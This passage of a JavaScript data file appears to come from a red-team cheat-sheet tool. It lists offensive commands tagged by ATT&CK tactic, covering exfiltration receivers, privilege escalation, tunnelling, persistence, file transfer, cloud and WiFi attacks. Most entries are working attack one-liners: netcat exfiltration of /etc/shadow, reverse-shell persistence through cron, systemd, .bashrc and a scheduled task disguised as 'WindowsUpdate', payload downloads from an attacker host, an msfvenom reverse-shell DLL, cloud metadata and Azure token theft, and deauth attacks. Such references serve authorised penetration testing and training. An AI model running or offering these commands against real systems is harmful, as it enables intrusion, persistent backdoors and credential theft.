      description: 'WebDAV server for Windows file transfer (net use \\\\LHOST\\share).',
      tags: ['webdav', 'impacket', 'receiver'], command: '# Impacket WebDAV:\nwsgidav --host 0.0.0.0 --port 80 --root /tmp/share --auth anonymous\n# On Windows target:\nnet use Z: http://LHOST/share\ncopy C:\\secrets.txt Z:\\',
      killchain: 'c2', attack: ['command-control', 'exfiltration'], pyramid: 'tools', owasp: [] },
{ id: 'nc-file-receiver', title: 'Netcat File Receiver', team: 'red', category: 'receivers',
      description: 'Catch a single file sent via netcat.',
      tags: ['nc', 'receiver', 'exfiltration'], command: '# Receiver (attacker):\nnc -lvnp 9001 > received_file\n# Sender (target):\nnc LHOST 9001 < /etc/shadow\n# or with cat:\ncat /etc_passwd | nc LHOST 9001',
      killchain: 'actions', attack: ['exfiltration'], pyramid: 'ips', owasp: [] },
{ id: 'interactsh', title: 'Interactsh OOB Server', team: 'red', category: 'receivers',
      description: 'Out-of-band interaction server — catches DNS, HTTP, SMTP, LDAP callbacks. Perfect for blind SSRF/XXE/RCE.',
      tags: ['interactsh', 'oob', 'receiver', 'callback'], command: 'interactsh-client\n# Generates a unique URL like abc123.oast.fun\n# Use in payloads: curl http://abc123.oast.fun/ssrf-test\n# Monitors DNS, HTTP, SMTP, LDAP callbacks in real-time',
      killchain: 'exploitation', attack: ['initial-access', 'execution'], pyramid: 'tools', owasp: ['A10'] },
{ id: 'callback-logger', title: 'HTTP Callback Logger', team: 'red', category: 'receivers',
      description: 'Log all incoming HTTP requests with headers and body — blind injection validator.',
      tags: ['python', 'callback', 'receiver'], command: 'python3 -c "\nimport http.server, json\nclass H(http.server.BaseHTTPRequestHandler):\n  def do_GET(self): self._log()\n  def do_POST(self): self._log()\n  def _log(self):\n    length = int(self.headers.get(\'Content-Length\', 0))\n    body = self.rfile.read(length).decode() if length else \'\'\n    print(f\'\\n=== {self.command} {self.path} ===\')\n    print(dict(self.headers))\n    if body: print(f\'Body: {body}\')\n    self.send_response(200); self.end_headers(); self.wfile.write(b\'ok\')\nhttp.server.HTTPServer((\'0.0.0.0\', 8888), H).serve_forever()\n"',
      killchain: 'exploitation', attack: ['initial-access'], pyramid: 'ips', owasp: ['A10', 'A03'] },
{ id: 'dns-listener', title: 'DNS Exfil Listener', team: 'red', category: 'receivers',
      description: 'Catch DNS queries for data exfiltration or OOB detection.',
      tags: ['dns', 'exfiltration', 'receiver'], command: '# Using tcpdump:\ntcpdump -i any -n udp port 53 -l | tee dns_exfil.log\n# Using dnscat2 server:\nruby dnscat2.rb --dns "domain=exfil.DOMAIN" --no-cache',
      killchain: 'actions', attack: ['exfiltration', 'command-control'], pyramid: 'domains', owasp: [] },
{ id: 'smtp-receiver', title: 'SMTP Catch-all Server', team: 'red', category: 'receivers',
      description: 'Local SMTP server that logs all received emails (great for password reset capture).',
      tags: ['python', 'smtp', 'receiver', 'email'], command: 'python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25\n# Or with aiosmtpd:\npython3 -c "\nimport asyncio\nfrom aiosmtpd.controller import Controller\nfrom aiosmtpd.handlers import Debugging\nController(Debugging(), hostname=\'0.0.0.0\', port=25).start()\nasyncio.get_event_loop().run_forever()\n"',
      killchain: 'exploitation', attack: ['credential-access'], pyramid: 'artifacts', owasp: ['A07'] },
{ id: 'ngrok-tunnel', title: 'Ngrok Tunnel', team: 'red', category: 'receivers',
      description: 'Expose local listener through NAT via ngrok.',
      tags: ['ngrok', 'tunnel', 'receiver'], command: '# HTTP:\nngrok http 8000\n# TCP (for reverse shells):\nngrok tcp LPORT\n# Then use the ngrok URL/port as LHOST in payloads',
      killchain: 'c2', attack: ['command-control'], pyramid: 'ips', owasp: [] },
{ id: 'responder-http', title: 'Responder HTTP/SMB Capture', team: 'red', category: 'receivers',
      description: 'Capture NTLM hashes via spoofed HTTP/SMB/WPAD authentication.',
      tags: ['responder', 'ntlm', 'receiver', 'capture'], command: 'responder -I eth0 -wPv\n# Force auth from Windows target:\n# dir \\\\LHOST\\share\n# or: curl http://LHOST/any',
      killchain: 'exploitation', attack: ['credential-access'], pyramid: 'ttps', owasp: ['A07'] },
{ id: 'scp-receive', title: 'SCP File Receive', team: 'red', category: 'receivers',
      description: 'Pull files from target via SCP/SSH.',
      tags: ['ssh', 'scp', 'receiver'], command: '# Pull from target:\nscp USER@TARGET:/etc/shadow ./loot/\n# Pull directory:\nscp -r USER@TARGET:/var/log/ ./loot/logs/\n# Push to target:\nscp payload.sh USER@TARGET:/tmp/',
      killchain: 'actions', attack: ['exfiltration', 'command-control'], pyramid: 'artifacts', owasp: [] },
{ id: 'linpeas', title: 'LinPEAS', team: 'red', category: 'privesc',
      description: 'Local Linux privilege escalation checks.',
      tags: ['linux', 'privesc', 'linpeas'], command: 'curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh',
      killchain: 'actions', attack: ['privilege-escalation', 'discovery'], pyramid: 'tools', owasp: ['A01'] },
{ id: 'winpeas', title: 'WinPEAS', team: 'red', category: 'privesc',
      description: 'Local Windows privilege escalation checks.',
      tags: ['windows', 'privesc', 'winpeas'], command: 'powershell -c "iwr -UseBasicParsing https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe -OutFile $env:TEMP\\winpeas.exe; Start-Process $env:TEMP\\winpeas.exe"',
      killchain: 'actions', attack: ['privilege-escalation', 'discovery'], pyramid: 'tools', owasp: ['A01'] },
{ id: 'sudo-l', title: 'Sudo Rights Check', team: 'red', category: 'privesc',
      description: 'Identify sudo-based escalation paths.',
      tags: ['linux', 'sudo'], command: 'sudo -l',
      killchain: 'actions', attack: ['privilege-escalation'], pyramid: 'ttps', owasp: ['A01'] },
{ id: 'find-suid', title: 'Find SUID Binaries', team: 'red', category: 'privesc',
      description: 'Look for risky SUID binaries.',
      tags: ['linux', 'suid'], command: 'find / -perm -4000 -type f 2>/dev/null',
      killchain: 'actions', attack: ['privilege-escalation', 'discovery'], pyramid: 'ttps', owasp: ['A01'] },
{ id: 'linux-capabilities', title: 'Linux Capabilities Check', team: 'red', category: 'privesc',
      description: 'Find binaries with elevated Linux capabilities.',
      tags: ['linux', 'capabilities'], command: 'getcap -r / 2>/dev/null',
      killchain: 'actions', attack: ['privilege-escalation', 'discovery'], pyramid: 'ttps', owasp: ['A01'] },
{ id: 'writable-path', title: 'Writable PATH Dirs', team: 'red', category: 'privesc',
      description: 'Find writable directories in PATH for hijacking.',
      tags: ['linux', 'path-hijack'], command: 'echo $PATH | tr ":" "\\n" | xargs -I{} sh -c \'test -w "{}" && echo "WRITABLE: {}"\'',
      killchain: 'actions', attack: ['privilege-escalation'], pyramid: 'ttps', owasp: ['A01'] },
{ id: 'pspy', title: 'pspy Process Snoop', team: 'red', category: 'privesc',
      description: 'Monitor processes without root using pspy.',
      tags: ['linux', 'pspy', 'processes'], command: './pspy64 -pf -i 1000',
      killchain: 'actions', attack: ['privilege-escalation', 'discovery'], pyramid: 'tools', owasp: [] },
{ id: 'gtfobins-check', title: 'GTFOBins Check', team: 'red', category: 'privesc',
      description: 'Check SUID binaries against GTFOBins for privesc.',
      tags: ['linux', 'gtfobins', 'suid'], command: 'find / -perm -4000 -type f 2>/dev/null | while read f; do echo "=== $f ==="; strings "$f" | head -5; done',
      killchain: 'actions', attack: ['privilege-escalation'], pyramid: 'ttps', owasp: ['A01'] },
{ id: 'win-token-priv', title: 'Windows Token Privileges', team: 'red', category: 'privesc',
      description: 'Check current token privileges for privesc vectors.',
      tags: ['windows', 'token', 'privileges'], command: 'whoami /priv',
      killchain: 'actions', attack: ['privilege-escalation', 'discovery'], pyramid: 'ttps', owasp: ['A01'], os: 'windows' },
{ id: 'unquoted-svc', title: 'Unquoted Service Paths', team: 'red', category: 'privesc',
      description: 'Find unquoted Windows service paths for hijacking.',
      tags: ['windows', 'services'], command: 'wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows" | findstr /i /v """',
      killchain: 'actions', attack: ['privilege-escalation'], pyramid: 'ttps', owasp: ['A01'], os: 'windows' },
{ id: 'always-install-elevated', title: 'AlwaysInstallElevated', team: 'red', category: 'privesc',
      description: 'Check if MSI always installs elevated (privesc via msiexec).',
      tags: ['windows', 'registry', 'msi'], command: 'reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated',
      killchain: 'actions', attack: ['privilege-escalation'], pyramid: 'ttps', owasp: ['A01'], os: 'windows' },
{ id: 'dll-hijack-search', title: 'DLL Hijack Search Order', team: 'red', category: 'privesc',
      description: 'Find missing DLLs for DLL hijacking via Process Monitor.',
      tags: ['windows', 'dll', 'hijack'], command: '# Use Procmon: Filter → Path contains ".dll" AND Result is "NAME NOT FOUND"\n# Then craft payload DLL with msfvenom:\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=LHOST LPORT=LPORT -f dll -o hijacked.dll',
      killchain: 'actions', attack: ['privilege-escalation', 'persistence'], pyramid: 'ttps', owasp: ['A01'], os: 'windows' },
{ id: 'chisel-server', title: 'Chisel Server', team: 'red', category: 'tunnel',
      description: 'Start chisel server for pivoting.',
      tags: ['chisel', 'pivot'], command: 'chisel server --reverse -p 8001',
      killchain: 'c2', attack: ['command-control'], pyramid: 'tools', owasp: [] },
{ id: 'chisel-client', title: 'Chisel Reverse SOCKS', team: 'red', category: 'tunnel',
      description: 'Create reverse SOCKS proxy from target.',
      tags: ['chisel', 'socks', 'pivot'], command: 'chisel client LHOST:8001 R:socks',
      killchain: 'c2', attack: ['command-control'], pyramid: 'artifacts', owasp: [] },
{ id: 'ssh-dynamic', title: 'SSH Dynamic SOCKS', team: 'red', category: 'tunnel',
      description: 'SOCKS proxy via SSH.',
      tags: ['ssh', 'socks', 'pivot'], command: 'ssh -D 9050 USER@TARGET',
      killchain: 'c2', attack: ['command-control'], pyramid: 'artifacts', owasp: [] },
{ id: 'ssh-local', title: 'SSH Local Port Forward', team: 'red', category: 'tunnel',
      description: 'Forward remote port to local machine.',
      tags: ['ssh', 'pivot'], command: 'ssh -L 8080:127.0.0.1:80 USER@TARGET',
      killchain: 'c2', attack: ['command-control', 'lateral-movement'], pyramid: 'artifacts', owasp: [] },
{ id: 'ssh-remote', title: 'SSH Remote Port Forward', team: 'red', category: 'tunnel',
      description: 'Expose local port on remote host.',
      tags: ['ssh', 'pivot'], command: 'ssh -R 9090:127.0.0.1:8080 USER@TARGET',
      killchain: 'c2', attack: ['command-control'], pyramid: 'artifacts', owasp: [] },
{ id: 'socat-redirect', title: 'Socat Redirect', team: 'red', category: 'tunnel',
      description: 'Relay traffic between hosts/ports.',
      tags: ['socat', 'pivot'], command: 'socat TCP-LISTEN:8080,fork TCP:TARGET:80',
      killchain: 'c2', attack: ['command-control'], pyramid: 'artifacts', owasp: [] },
{ id: 'ligolo', title: 'Ligolo-ng Agent', team: 'red', category: 'tunnel',
      description: 'Lightweight tunneling — agent to proxy.',
      tags: ['ligolo', 'pivot'], command: '# On attacker: ligolo-proxy -selfcert\n# On target:\n./agent -connect LHOST:11601 -ignore-cert',
      killchain: 'c2', attack: ['command-control'], pyramid: 'tools', owasp: [] },
{ id: 'persist-cron', title: 'Cron Persistence', team: 'red', category: 'persist',
      description: 'Add reverse shell cron job.',
      tags: ['cron', 'persistence', 'linux'], command: '(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c \'bash -i >& /dev/tcp/LHOST/LPORT 0>&1\'") | crontab -',
      killchain: 'installation', attack: ['persistence'], pyramid: 'ttps', owasp: [] },
{ id: 'persist-schtask', title: 'Scheduled Task', team: 'red', category: 'persist',
      description: 'Windows scheduled task for persistence.',
      tags: ['schtasks', 'persistence', 'windows'], command: 'schtasks /create /sc MINUTE /mo 5 /tn "WindowsUpdate" /tr "powershell -ep bypass -w hidden -c IEX(IWR http://LHOST/shell.ps1)" /ru SYSTEM',
      killchain: 'installation', attack: ['persistence'], pyramid: 'artifacts', owasp: [] },
{ id: 'persist-service', title: 'Systemd Service', team: 'red', category: 'persist',
      description: 'Create systemd service for persistent access.',
      tags: ['systemd', 'persistence', 'linux'], command: 'cat <<EOF > /etc/systemd/system/update.service\n[Unit]\nDescription=System Update\n[Service]\nExecStart=/bin/bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"\nRestart=always\nRestartSec=60\n[Install]\nWantedBy=multi-user.target\nEOF\nsystemctl enable --now update.service',
      killchain: 'installation', attack: ['persistence'], pyramid: 'artifacts', owasp: [] },
{ id: 'persist-ssh-key', title: 'SSH Authorized Key', team: 'red', category: 'persist',
      description: 'Add attacker SSH public key for persistent access.',
      tags: ['ssh', 'persistence', 'linux'], command: 'echo "ssh-rsa AAAA...attacker-key..." >> ~/.ssh/authorized_keys\nchmod 600 ~/.ssh/authorized_keys',
      killchain: 'installation', attack: ['persistence'], pyramid: 'artifacts', owasp: ['A01'] },
{ id: 'persist-bashrc', title: 'Bashrc Backdoor', team: 'red', category: 'persist',
      description: 'Add reverse shell to bashrc for login persistence.',
      tags: ['bashrc', 'persistence', 'linux'], command: 'echo "bash -i >& /dev/tcp/LHOST/LPORT 0>&1 &" >> ~/.bashrc',
      killchain: 'installation', attack: ['persistence'], pyramid: 'artifacts', owasp: [] },
{ id: 'persist-run-key', title: 'Registry Run Key', team: 'red', category: 'persist',
      description: 'Add Windows registry run key for startup persistence.',
      tags: ['registry', 'persistence', 'windows'], command: 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "WindowsUpdate" /t REG_SZ /d "powershell -ep bypass -w hidden -f C:\\Users\\Public\\update.ps1" /f',
      killchain: 'installation', attack: ['persistence'], pyramid: 'artifacts', owasp: [], os: 'windows' },
{ id: 'persist-winlogon', title: 'Winlogon Helper DLL', team: 'red', category: 'persist',
      description: 'Modify Winlogon to load custom DLL on login.',
      tags: ['winlogon', 'persistence', 'windows'], command: 'reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" /v Userinit /t REG_SZ /d "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Public\\payload.exe" /f',
      killchain: 'installation', attack: ['persistence'], pyramid: 'artifacts', owasp: [], os: 'windows' },
{ id: 'persist-startup-folder', title: 'Startup Folder', team: 'red', category: 'persist',
      description: 'Drop payload in Windows Startup folder.',
      tags: ['startup', 'persistence', 'windows'], command: 'copy payload.exe "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.exe"',
      killchain: 'installation', attack: ['persistence'], pyramid: 'artifacts', owasp: [], os: 'windows' },
{ id: 'download-http', title: 'File Download (Linux)', team: 'red', category: 'transfer',
      description: 'Download a file from attacker host.',
      tags: ['wget', 'curl'], command: 'wget http://LHOST:8000/payload -O /tmp/payload\n# or\ncurl -o /tmp/payload http://LHOST:8000/payload',
      killchain: 'delivery', attack: ['command-control'], pyramid: 'ips', owasp: [] },
{ id: 'upload-python-http', title: 'Python HTTP Server', team: 'red', category: 'transfer',
      description: 'Host current directory over HTTP.',
      tags: ['python', 'http-server'], command: 'python3 -m http.server 8000',
      killchain: 'delivery', attack: ['command-control'], pyramid: 'ips', owasp: [] },
{ id: 'smb-share', title: 'SMB Share (Impacket)', team: 'red', category: 'transfer',
      description: 'Temporary SMB share for Windows file transfer.',
      tags: ['smb', 'impacket'], command: 'impacket-smbserver share . -smb2support',
      killchain: 'delivery', attack: ['command-control', 'lateral-movement'], pyramid: 'tools', owasp: [] },
{ id: 'upload-certutil', title: 'Certutil Download', team: 'red', category: 'transfer',
      description: 'Download file on Windows using certutil.',
      tags: ['certutil', 'windows'], command: 'certutil -urlcache -split -f http://LHOST:8000/payload.exe C:\\Windows\\Temp\\payload.exe',
      killchain: 'delivery', attack: ['command-control'], pyramid: 'artifacts', owasp: [] },
{ id: 'upload-powershell', title: 'PowerShell Download', team: 'red', category: 'transfer',
      description: 'Download file on Windows using PowerShell.',
      tags: ['powershell', 'windows'], command: 'powershell -c "IWR -Uri http://LHOST:8000/payload.exe -OutFile C:\\Windows\\Temp\\payload.exe"',
      killchain: 'delivery', attack: ['command-control'], pyramid: 'artifacts', owasp: [] },
{ id: 'exfil-nc', title: 'Exfil via Netcat', team: 'red', category: 'transfer',
      description: 'Transfer file from target to attacker via nc.',
      tags: ['nc', 'exfiltration'], command: '# Attacker: nc -lvnp 9001 > loot.tar.gz\n# Target:\ntar czf - /path/to/loot | nc LHOST 9001',
      killchain: 'actions', attack: ['exfiltration'], pyramid: 'ips', owasp: [] },
{ id: 'exfil-base64', title: 'Base64 File Encode', team: 'red', category: 'transfer',
      description: 'Encode binary for copy-paste exfil.',
      tags: ['base64', 'exfiltration'], command: 'base64 -w0 /path/to/file\n# Decode on attacker:\necho "BASE64STRING" | base64 -d > file',
      killchain: 'actions', attack: ['exfiltration'], pyramid: 'ttps', owasp: [] },
{ id: 'netstat-linux', title: 'Open Ports (Linux)', team: 'red', category: 'enum',
      description: 'Check listening ports/processes on Linux.',
      tags: ['linux', 'ports'], command: 'ss -tulpen',
      killchain: 'recon', attack: ['discovery'], pyramid: 'artifacts', owasp: [] },
{ id: 'netstat-windows', title: 'Open Ports (Windows)', team: 'red', category: 'enum',
      description: 'Check listening ports/processes on Windows.',
      tags: ['windows', 'ports'], command: 'netstat -ano',
      killchain: 'recon', attack: ['discovery'], pyramid: 'artifacts', owasp: [] },
{ id: 'find-creds', title: 'Find Credentials', team: 'red', category: 'enum',
      description: 'Search for credential strings in configs.',
      tags: ['credentials', 'grep'], command: 'grep -RInE "password|passwd|pwd|secret|token|apikey" /etc /opt /var/www 2>/dev/null',
      killchain: 'actions', attack: ['credential-access', 'collection'], pyramid: 'ttps', owasp: ['A02'] },
{ id: 'world-writable', title: 'World-Writable Files', team: 'red', category: 'enum',
      description: 'Find world-writable files and directories.',
      tags: ['linux', 'permissions'], command: 'find / -writable -type f 2>/dev/null | grep -v proc',
      killchain: 'recon', attack: ['discovery'], pyramid: 'artifacts', owasp: ['A01'] },
{ id: 'recent-files', title: 'Recently Modified Files', team: 'red', category: 'enum',
      description: 'Find files modified in the last 24 hours.',
      tags: ['linux', 'files'], command: 'find / -mtime -1 -type f 2>/dev/null | grep -v proc | head -50',
      killchain: 'recon', attack: ['discovery', 'collection'], pyramid: 'artifacts', owasp: [] },
{ id: 'docker-enum', title: 'Docker Enumeration', team: 'red', category: 'enum',
      description: 'Enumerate Docker containers and images.',
      tags: ['docker', 'containers'], command: 'docker ps -a\ndocker images\ndocker network ls\nls -la /var/run/docker.sock',
      killchain: 'recon', attack: ['discovery'], pyramid: 'tools', owasp: [] },
{ id: 'smb-enum', title: 'SMB Share Enumeration', team: 'red', category: 'enum',
      description: 'Enumerate SMB shares with smbclient.',
      tags: ['smb', 'shares', 'windows'], command: 'smbclient -L //TARGET -N\n# or with creds:\nsmbclient -L //TARGET -U "user%password"',
      killchain: 'recon', attack: ['discovery'], pyramid: 'ips', owasp: [] },
{ id: 'snmp-walk', title: 'SNMP Walk', team: 'red', category: 'enum',
      description: 'Enumerate SNMP information from target.',
      tags: ['snmp', 'network'], command: 'snmpwalk -v2c -c public TARGET\n# Extended info:\nsnmpwalk -v2c -c public TARGET 1.3.6.1.2.1.25.4.2.1.2',
      killchain: 'recon', attack: ['discovery'], pyramid: 'ips', owasp: [] },
{ id: 'nfs-enum', title: 'NFS Share Enumeration', team: 'red', category: 'enum',
      description: 'List NFS shares and mount them.',
      tags: ['nfs', 'shares', 'linux'], command: 'showmount -e TARGET\n# Mount:\nmkdir /mnt/nfs && mount -t nfs TARGET:/share /mnt/nfs',
      killchain: 'recon', attack: ['discovery'], pyramid: 'ips', owasp: [] },
{ id: 'recon-ng', title: 'Recon-ng Framework', team: 'red', category: 'osint',
      description: 'Full-featured OSINT web reconnaissance framework.',
      tags: ['recon-ng', 'osint', 'enum'], command: 'recon-ng -w workspace\nmarketplace install all\nmodules load recon/domains-hosts/hackertarget\noptions set SOURCE DOMAIN\nrun',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'spiderfoot', title: 'SpiderFoot OSINT', team: 'red', category: 'osint',
      description: 'Automated OSINT collection across 200+ data sources.',
      tags: ['spiderfoot', 'osint'], command: 'spiderfoot -s DOMAIN -t all -o csv',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'maltego-transform', title: 'Maltego CE', team: 'red', category: 'osint',
      description: 'Visual link analysis and OSINT transforms.',
      tags: ['maltego', 'osint', 'graph'], command: '# Maltego CE: Create new graph > Add entity (Domain: DOMAIN) > Run All Transforms',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'whois-lookup', title: 'WHOIS Lookup', team: 'red', category: 'osint',
      description: 'Query domain registration info.',
      tags: ['whois', 'domain'], command: 'whois DOMAIN',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'dnsenum', title: 'DNS Enumeration', team: 'red', category: 'osint',
      description: 'Enumerate DNS records, zone transfers, brute-force subdomains.',
      tags: ['dnsenum', 'dns'], command: 'dnsenum --dnsserver TARGET --enum -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt DOMAIN',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'sherlock', title: 'Sherlock Username OSINT', team: 'red', category: 'osint',
      description: 'Find usernames across social networks.',
      tags: ['sherlock', 'username', 'social'], command: 'python3 sherlock USERNAME --print-found',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'theharvester-osint', title: 'theHarvester Email Harvest', team: 'red', category: 'osint',
      description: 'Harvest emails, subdomains, and IPs from public sources.',
      tags: ['theharvester', 'email', 'subdomain'], command: 'theHarvester -d DOMAIN -b google,linkedin,dnsdumpster -l 500',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'shodan-search', title: 'Shodan Search', team: 'red', category: 'osint',
      description: 'Search internet-facing devices and services.',
      tags: ['shodan', 'iot', 'network'], command: 'shodan search "hostname:DOMAIN"\nshodan host TARGET\nshodan count "apache country:NL"',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'ips', owasp: [] },
{ id: 'censys-search', title: 'Censys Search', team: 'red', category: 'osint',
      description: 'Search certificates and hosts on Censys.',
      tags: ['censys', 'certificates', 'tls'], command: 'censys search "services.tls.certificates.leaf.names: DOMAIN" --index-type hosts',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'subfinder-httpx', title: 'Subfinder + httpx Pipeline', team: 'red', category: 'osint',
      description: 'Fast passive subdomain enumeration with live check.',
      tags: ['subfinder', 'httpx', 'subdomain'], command: 'subfinder -d DOMAIN -o subdomains.txt\ncat subdomains.txt | httpx -silent -title -status-code',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'aws-enum-s3', title: 'AWS S3 Bucket Enum', team: 'red', category: 'cloud',
      description: 'Enumerate public S3 buckets and list contents.',
      tags: ['aws', 'cloud', 's3'], command: 'aws s3 ls s3://DOMAIN --no-sign-request\n# Brute-force bucket names:\nfor b in $(cat buckets.txt); do aws s3 ls s3://$b --no-sign-request 2>/dev/null && echo "OPEN: $b"; done',
      killchain: 'recon', attack: ['reconnaissance', 'collection'], pyramid: 'artifacts', owasp: ['A01', 'A05'] },
{ id: 'aws-enum-iam', title: 'AWS IAM Enumeration', team: 'red', category: 'cloud',
      description: 'Enumerate IAM users, roles, and policies with stolen creds.',
      tags: ['aws', 'cloud', 'iam', 'pacu'], command: 'aws sts get-caller-identity\naws iam list-users\naws iam list-roles\naws iam list-attached-user-policies --user-name USER',
      killchain: 'recon', attack: ['discovery', 'credential-access'], pyramid: 'ttps', owasp: ['A01'] },
{ id: 'aws-metadata', title: 'AWS Metadata SSRF', team: 'red', category: 'cloud',
      description: 'Access EC2 instance metadata via SSRF (IMDSv1).',
      tags: ['aws', 'cloud', 'ssrf', 'metadata'], command: 'curl -s http://169.254.169.254/latest/meta-data/\ncurl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/\ncurl -s http://169.254.169.254/latest/user-data',
      killchain: 'exploitation', attack: ['credential-access', 'collection'], pyramid: 'ttps', owasp: ['A10'] },
{ id: 'azure-enum', title: 'Azure AD Enumeration', team: 'red', category: 'cloud',
      description: 'Enumerate Azure AD tenant, users, and apps.',
      tags: ['azure', 'cloud', 'aad'], command: '# Check tenant exists:\ncurl -s "https://login.microsoftonline.com/DOMAIN/.well-known/openid-configuration" | jq .token_endpoint\n# AADInternals:\nInvoke-AADIntReconAsOutsider -DomainName DOMAIN',
      killchain: 'recon', attack: ['reconnaissance', 'discovery'], pyramid: 'domains', owasp: ['A01'] },
{ id: 'docker-escape', title: 'Docker Container Escape', team: 'red', category: 'cloud',
      description: 'Check for container escape vectors.',
      tags: ['docker', 'container', 'escape'], command: '# Check if in container:\ncat /proc/1/cgroup | grep -i docker\n# Mounted docker socket?\nls -la /var/run/docker.sock\n# Privileged container escape:\nmount /dev/sda1 /mnt && chroot /mnt',
      killchain: 'actions', attack: ['privilege-escalation'], pyramid: 'ttps', owasp: ['A05'] },
{ id: 'k8s-enum', title: 'Kubernetes Enumeration', team: 'red', category: 'cloud',
      description: 'Enumerate K8s resources from a compromised pod.',
      tags: ['kubernetes', 'k8s', 'cloud'], command: '# Check if in K8s:\nenv | grep KUBERNETES\nls /var/run/secrets/kubernetes.io/serviceaccount/\n# Enumerate with token:\nTOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\ncurl -sk https://kubernetes.default/api/v1/namespaces -H "Authorization: Bearer $TOKEN"',
      killchain: 'recon', attack: ['discovery'], pyramid: 'ttps', owasp: ['A01', 'A05'] },
{ id: 'gcp-enum', title: 'GCP Enumeration', team: 'red', category: 'cloud',
      description: 'Enumerate GCP project resources with compromised credentials.',
      tags: ['gcp', 'cloud', 'google'], command: 'gcloud projects list\ngcloud compute instances list\ngcloud storage ls\ngcloud iam service-accounts list\ngcloud functions list',
      killchain: 'recon', attack: ['discovery'], pyramid: 'ttps', owasp: ['A01'] },
{ id: 'azure-token-steal', title: 'Azure Token Theft', team: 'red', category: 'cloud',
      description: 'Steal Azure access tokens from logged-in sessions.',
      tags: ['azure', 'cloud', 'token'], command: '# PowerShell — steal token from Az module cache:\n$token = (Get-AzAccessToken).Token\n# Or from metadata:\ncurl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"',
      killchain: 'exploitation', attack: ['credential-access'], pyramid: 'ttps', owasp: ['A07'] },
{ id: 'pacu-exploit', title: 'Pacu AWS Exploitation', team: 'red', category: 'cloud',
      description: 'AWS exploitation framework — auto-discover and exploit misconfigs.',
      tags: ['pacu', 'aws', 'cloud', 'exploit'], command: 'pacu\n# In Pacu shell:\nset_keys\nrun iam__enum_permissions\nrun iam__privesc_scan\nrun lambda__enum\nrun ec2__enum',
      killchain: 'exploitation', attack: ['privilege-escalation', 'discovery'], pyramid: 'tools', owasp: ['A01', 'A05'] },
{ id: 'airmon-start', title: 'Enable Monitor Mode', team: 'red', category: 'wireless',
      description: 'Put WiFi adapter in monitor mode for sniffing.',
      tags: ['aircrack-ng', 'wifi', 'monitor'], command: 'airmon-ng check kill\nairmon-ng start wlan0',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'tools', owasp: [] },
{ id: 'airodump', title: 'WiFi Network Scan', team: 'red', category: 'wireless',
      description: 'Scan for nearby wireless networks and clients.',
      tags: ['aircrack-ng', 'wifi', 'scan'], command: 'airodump-ng wlan0mon\n# Target specific channel/BSSID:\nairodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'artifacts', owasp: [] },
{ id: 'aireplay-deauth', title: 'WiFi Deauth Attack', team: 'red', category: 'wireless',
      description: 'Force client disconnection to capture WPA handshake.',
      tags: ['aircrack-ng', 'wifi', 'deauth'], command: 'aireplay-ng -0 5 -a BSSID -c CLIENT_MAC wlan0mon\n# Then crack captured handshake:\naircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap',
      killchain: 'exploitation', attack: ['credential-access'], pyramid: 'ttps', owasp: [] },
{ id: 'bettercap-wifi', title: 'Bettercap WiFi', team: 'red', category: 'wireless',
      description: 'Swiss army knife for WiFi attacks — deauth, probe, evil twin.',
      tags: ['bettercap', 'wifi'], command: 'bettercap -iface wlan0mon\n# In bettercap:\nwifi.recon on\nwifi.show\nwifi.deauth AA:BB:CC:DD:EE:FF',
      killchain: 'exploitation', attack: ['credential-access', 'initial-access'], pyramid: 'tools', owasp: [] },
{ id: 'wifite', title: 'Wifite Automated WiFi', team: 'red', category: 'wireless',
      description: 'Automated WiFi auditing — WEP/WPA/WPS attacks.',
      tags: ['wifite', 'wifi', 'automated'], command: 'wifite --kill\n# Target specific network:\nwifite -e "TARGET_SSID" -dict /usr/share/wordlists/rockyou.txt',
      killchain: 'exploitation', attack: ['credential-access'], pyramid: 'tools', owasp: [] }
];
